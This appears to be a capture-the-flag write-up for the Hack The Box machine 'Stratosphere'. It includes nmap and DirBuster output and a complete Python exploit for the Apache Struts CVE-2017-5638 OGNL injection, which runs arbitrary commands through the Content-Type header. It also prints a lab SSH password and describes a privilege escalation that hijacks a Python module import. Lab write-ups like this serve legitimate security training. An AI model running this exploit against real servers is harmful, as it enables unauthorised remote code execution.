Difficulty Rating:

Machine: Stratosphere
OS: Linux
IP: 10.10.10.64


The machine runs web services on port 80 and 8080, which uses Apache Struts. This is vulnerable to CVE-2017-5638 cause due to Apache Struts, and get gain Remote Code Execution (RCE). Privilege escalation was done due to poor sudo permissions.


  • Nmap
# Nmap 7.70 scan initiated Mon Jun 11 21:29:36 2018 as: nmap -A -oN stratosphere.nmap -v 10.10.10.64
Nmap scan report for 10.10.10.64
Host is up (0.26s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA)
|   256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA)
|_  256 d7:6b:66:9c:19:fc:aa:66:6c:18:7a:cc:b5:87:0e:40 (ED25519)
80/tcp   open  http
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 1114
|     Date: Mon, 11 Jun 2018 16:00:00 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 404 
|     Found</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body>
|   GetRequest: 
|     HTTP/1.1 200 
|     Accept-Ranges: bytes
|     ETag: W/"1708-1519762495000"
|     Last-Modified: Tue, 27 Feb 2018 20:14:55 GMT
|     Content-Type: text/html
|     Content-Length: 1708
|     Date: Mon, 11 Jun 2018 15:59:58 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <meta charset="utf-8"/>
|     <title>Stratosphere</title>
|     <link rel="stylesheet" type="text/css" href="main.css">
|     </head>
|     <body>
|     <div id="background"></div>
|     <header id="main-header" class="hidden">
|     <div class="container">
|     <div class="content-wrap">
|     <p><i class="fa fa-diamond"></i></p>
|     <nav>
|     class="btn" href="GettingStarted.html">Get started</a>
|     </nav>
|     </div>
|     </div>
|     </header>
|     <section id="greeting">
|     <div class="container">
|     <div class="content-wrap">
|     <h1>Stratosphere<br>We protect your credit.</h1>
|     class="btn" href="GettingStarted.html">Get started now</a>
|     <p><i class="ar
|   HTTPOptions: 
|     HTTP/1.1 200 
|     Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS
|     Content-Length: 0
|     Date: Mon, 11 Jun 2018 15:59:59 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Transfer-Encoding: chunked
|     Date: Mon, 11 Jun 2018 15:59:59 GMT
|     Connection: close
|   X11Probe: 
|     HTTP/1.1 400 
|     Transfer-Encoding: chunked
|     Date: Mon, 11 Jun 2018 16:00:00 GMT
|_    Connection: close
| http-methods: 
|   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_  Potentially risky methods: PUT DELETE
|_http-title: Stratosphere
8080/tcp open  http-proxy
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 1114
|     Date: Mon, 11 Jun 2018 16:00:02 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 404 
|     Found</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body>
|   GetRequest: 
|     HTTP/1.1 200 
|     Accept-Ranges: bytes
|     ETag: W/"1708-1519762495000"
|     Last-Modified: Tue, 27 Feb 2018 20:14:55 GMT
|     Content-Type: text/html
|     Content-Length: 1708
|     Date: Mon, 11 Jun 2018 15:59:58 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <meta charset="utf-8"/>
|     <title>Stratosphere</title>
|     <link rel="stylesheet" type="text/css" href="main.css">
|     </head>
|     <body>
|     <div id="background"></div>
|     <header id="main-header" class="hidden">
|     <div class="container">
|     <div class="content-wrap">
|     <p><i class="fa fa-diamond"></i></p>
|     <nav>
|     class="btn" href="GettingStarted.html">Get started</a>
|     </nav>
|     </div>
|     </div>
|     </header>
|     <section id="greeting">
|     <div class="container">
|     <div class="content-wrap">
|     <h1>Stratosphere<br>We protect your credit.</h1>
|     class="btn" href="GettingStarted.html">Get started now</a>
|     <p><i class="ar
|   HTTPOptions: 
|     HTTP/1.1 200 
|     Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS
|     Content-Length: 0
|     Date: Mon, 11 Jun 2018 15:59:59 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Transfer-Encoding: chunked
|     Date: Mon, 11 Jun 2018 15:59:59 GMT
|_    Connection: close
| http-methods: 
|   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_  Potentially risky methods: PUT DELETE
|_http-title: Stratosphere
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.70%I=7%D=6/11%Time=5B1E9C7F%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,786,"HTTP/1\.1\x20200\x20\r\nAccept-Ranges:\x20bytes\r\nETag:\x2
SF:0W/\"1708-1519762495000\"\r\nLast-Modified:\x20Tue,\x2027\x20Feb\x20201
SF:8\x2020:14:55\x20GMT\r\nContent-Type:\x20text/html\r\nContent-Length:\x
SF:201708\r\nDate:\x20Mon,\x2011\x20Jun\x202018\x2015:59:58\x20GMT\r\nConn
SF:ection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20\x2
SF:0\x20<meta\x20charset=\"utf-8\"/>\n\x20\x20\x20\x20<title>Stratosphere<
SF:/title>\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20type=\"text/css
SF:\"\x20href=\"main\.css\">\n</head>\n\n<body>\n<div\x20id=\"background\"
SF:></div>\n<header\x20id=\"main-header\"\x20class=\"hidden\">\n\x20\x20<d
SF:iv\x20class=\"container\">\n\x20\x20\x20\x20<div\x20class=\"content-wra
SF:p\">\n\x20\x20\x20\x20\x20\x20<p><i\x20class=\"fa\x20fa-diamond\"></i><
SF:/p>\n\x20\x20\x20\x20\x20\x20<nav>\n\x20\x20\x20\x20\x20\x20\x20\x20<a\
SF:x20class=\"btn\"\x20href=\"GettingStarted\.html\">Get\x20started</a>\n\
SF:x20\x20\x20\x20\x20\x20</nav>\n\x20\x20\x20\x20</div>\n\x20\x20</div>\n
SF:</header>\n\n<section\x20id=\"greeting\">\n\x20\x20<div\x20class=\"cont
SF:ainer\">\n\x20\x20\x20\x20<div\x20class=\"content-wrap\">\n\x20\x20\x20
SF:\x20\x20\x20<h1>Stratosphere<br>We\x20protect\x20your\x20credit\.</h1>\
SF:n\x20\x20\x20\x20\x20\x20<a\x20class=\"btn\"\x20href=\"GettingStarted\.
SF:html\">Get\x20started\x20now</a>\n\x20\x20\x20\x20\x20\x20<p><i\x20clas
SF:s=\"ar")%r(HTTPOptions,8A,"HTTP/1\.1\x20200\x20\r\nAllow:\x20GET,\x20HE
SF:AD,\x20POST,\x20PUT,\x20DELETE,\x20OPTIONS\r\nContent-Length:\x200\r\nD
SF:ate:\x20Mon,\x2011\x20Jun\x202018\x2015:59:59\x20GMT\r\nConnection:\x20
SF:close\r\n\r\n")%r(RTSPRequest,6A,"HTTP/1\.1\x20400\x20\r\nTransfer-Enco
SF:ding:\x20chunked\r\nDate:\x20Mon,\x2011\x20Jun\x202018\x2015:59:59\x20G
SF:MT\r\nConnection:\x20close\r\n\r\n0\r\n\r\n")%r(X11Probe,6A,"HTTP/1\.1\
SF:x20400\x20\r\nTransfer-Encoding:\x20chunked\r\nDate:\x20Mon,\x2011\x20J
SF:un\x202018\x2016:00:00\x20GMT\r\nConnection:\x20close\r\n\r\n0\r\n\r\n"
SF:)%r(FourOhFourRequest,4F6,"HTTP/1\.1\x20404\x20\r\nContent-Type:\x20tex
SF:t/html;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x201
SF:114\r\nDate:\x20Mon,\x2011\x20Jun\x202018\x2016:00:00\x20GMT\r\nConnect
SF:ion:\x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><titl
SF:e>HTTP\x20Status\x20404\x20\xe2\x80\x93\x20Not\x20Found</title><style\x
SF:20type=\"text/css\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:wh
SF:ite;background-color:#525D76;font-size:22px;}\x20h2\x20{font-family:Tah
SF:oma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16p
SF:x;}\x20h3\x20{font-family:Tahoma,Arial,sans-serif;color:white;backgroun
SF:d-color:#525D76;font-size:14px;}\x20body\x20{font-family:Tahoma,Arial,s
SF:ans-serif;color:black;background-color:white;}\x20b\x20{font-family:Tah
SF:oma,Arial,sans-serif;color:white;background-color:#525D76;}\x20p\x20{fo
SF:nt-family:Tahoma,Arial,sans-serif;background:white;color:black;font-siz
SF:e:12px;}\x20a\x20{color:black;}\x20a\.name\x20{color:black;}\x20\.line\
SF:x20{height:1px;background-color:#525D76;border:none;}</style></head><bo
SF:dy>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8080-TCP:V=7.70%I=7%D=6/11%Time=5B1E9C7F%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,786,"HTTP/1\.1\x20200\x20\r\nAccept-Ranges:\x20bytes\r\nETag:\
SF:x20W/\"1708-1519762495000\"\r\nLast-Modified:\x20Tue,\x2027\x20Feb\x202
SF:018\x2020:14:55\x20GMT\r\nContent-Type:\x20text/html\r\nContent-Length:
SF:\x201708\r\nDate:\x20Mon,\x2011\x20Jun\x202018\x2015:59:58\x20GMT\r\nCo
SF:nnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20\
SF:x20\x20<meta\x20charset=\"utf-8\"/>\n\x20\x20\x20\x20<title>Stratospher
SF:e</title>\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20type=\"text/c
SF:ss\"\x20href=\"main\.css\">\n</head>\n\n<body>\n<div\x20id=\"background
SF:\"></div>\n<header\x20id=\"main-header\"\x20class=\"hidden\">\n\x20\x20
SF:<div\x20class=\"container\">\n\x20\x20\x20\x20<div\x20class=\"content-w
SF:rap\">\n\x20\x20\x20\x20\x20\x20<p><i\x20class=\"fa\x20fa-diamond\"></i
SF:></p>\n\x20\x20\x20\x20\x20\x20<nav>\n\x20\x20\x20\x20\x20\x20\x20\x20<
SF:a\x20class=\"btn\"\x20href=\"GettingStarted\.html\">Get\x20started</a>\
SF:n\x20\x20\x20\x20\x20\x20</nav>\n\x20\x20\x20\x20</div>\n\x20\x20</div>
SF:\n</header>\n\n<section\x20id=\"greeting\">\n\x20\x20<div\x20class=\"co
SF:ntainer\">\n\x20\x20\x20\x20<div\x20class=\"content-wrap\">\n\x20\x20\x
SF:20\x20\x20\x20<h1>Stratosphere<br>We\x20protect\x20your\x20credit\.</h1
SF:>\n\x20\x20\x20\x20\x20\x20<a\x20class=\"btn\"\x20href=\"GettingStarted
SF:\.html\">Get\x20started\x20now</a>\n\x20\x20\x20\x20\x20\x20<p><i\x20cl
SF:ass=\"ar")%r(HTTPOptions,8A,"HTTP/1\.1\x20200\x20\r\nAllow:\x20GET,\x20
SF:HEAD,\x20POST,\x20PUT,\x20DELETE,\x20OPTIONS\r\nContent-Length:\x200\r\
SF:nDate:\x20Mon,\x2011\x20Jun\x202018\x2015:59:59\x20GMT\r\nConnection:\x
SF:20close\r\n\r\n")%r(RTSPRequest,6A,"HTTP/1\.1\x20400\x20\r\nTransfer-En
SF:coding:\x20chunked\r\nDate:\x20Mon,\x2011\x20Jun\x202018\x2015:59:59\x2
SF:0GMT\r\nConnection:\x20close\r\n\r\n0\r\n\r\n")%r(FourOhFourRequest,4F6
SF:,"HTTP/1\.1\x20404\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nC
SF:ontent-Language:\x20en\r\nContent-Length:\x201114\r\nDate:\x20Mon,\x201
SF:1\x20Jun\x202018\x2016:00:02\x20GMT\r\nConnection:\x20close\r\n\r\n<!do
SF:ctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Status\x20404\x
SF:20\xe2\x80\x93\x20Not\x20Found</title><style\x20type=\"text/css\">h1\x2
SF:0{font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525
SF:D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,sans-serif;colo
SF:r:white;background-color:#525D76;font-size:16px;}\x20h3\x20{font-family
SF::Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size
SF::14px;}\x20body\x20{font-family:Tahoma,Arial,sans-serif;color:black;bac
SF:kground-color:white;}\x20b\x20{font-family:Tahoma,Arial,sans-serif;colo
SF:r:white;background-color:#525D76;}\x20p\x20{font-family:Tahoma,Arial,sa
SF:ns-serif;background:white;color:black;font-size:12px;}\x20a\x20{color:b
SF:lack;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:1px;background
SF:-color:#525D76;border:none;}</style></head><body>");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 11 21:30:31 2018 -- 1 IP address (1 host up) scanned in 54.86 seconds

  • Port 80 and 8080 are web services.

  • Dirbuster

DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Mon Jun 11 22:21:34 IST 2018
--------------------------------

http://10.10.10.64:8080
--------------------------------
Directories found during testing:

Dirs found with a 200 response:

/
/Monitoring/

Dirs found with a 302 response:

/manager/


--------------------------------
Files found during testing:

Files found with a 200 responce:

/GettingStarted.html
/main.js


--------------------------------

  • /Monitoring/ redirects to Welocme.action
  • Looks like it is running Apache struts.
  • Let’s try the exploit CVE-2017-5638
  • Below code is the PoC of the CVE:
#!/usr/bin/python
# -*- coding: utf-8 -*-

import urllib2
import httplib


def exploit(url, cmd):
    payload = "%{(#_='multipart/form-data')."
    payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@[email protected]))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(#cmd='%s')." % cmd
    payload += "(#iswin=(@[email protected]('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    payload += "(#ros=(@[email protected]().getOutputStream()))."
    payload += "(@[email protected](#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"

    try:
        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
        request = urllib2.Request(url, headers=headers)
        page = urllib2.urlopen(request).read()
    except httplib.IncompleteRead, e:
        page = e.partial

    print(page)
    return page


if __name__ == '__main__':
    import sys
    if len(sys.argv) != 3:
        print("[*] struts2_S2-045.py <url> <cmd>")
    else:
        print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
        url = sys.argv[1]
        cmd = sys.argv[2]
        print("[*] cmd: %s\n" % cmd)
        exploit(url, cmd)
  • Use this code to get Remote Code Execution (RCE)

cve-2017-5638

  • Check the file db_connect. It has some credentials.

  • We can use them to connect to MySQL. We need to connect to MySQL in a non-interactive way. We use -e flag fot that.

  • Let’s try to retrieve some passwords from it.

  • SSH into the machine using following credentials.
SSH Creds
richard:9tc*rhKuG5TyXvUJOrE^5CK7k

  • Get user.txt

  • In the home directory, we find test.py

  • Check sudo permissions

  • We can execute test.py with sudo permissions.

  • We see that it uses import hashlib. To exploit that, create our own hashlib.py file with python code to spawn a shell. We need to create that file in the same directory as that of test.py

  • Create a file hashlib.py with following paylaod

  • Execute test.py with sudo command

  • Get root.txt
User and root owned!!

Share the fun!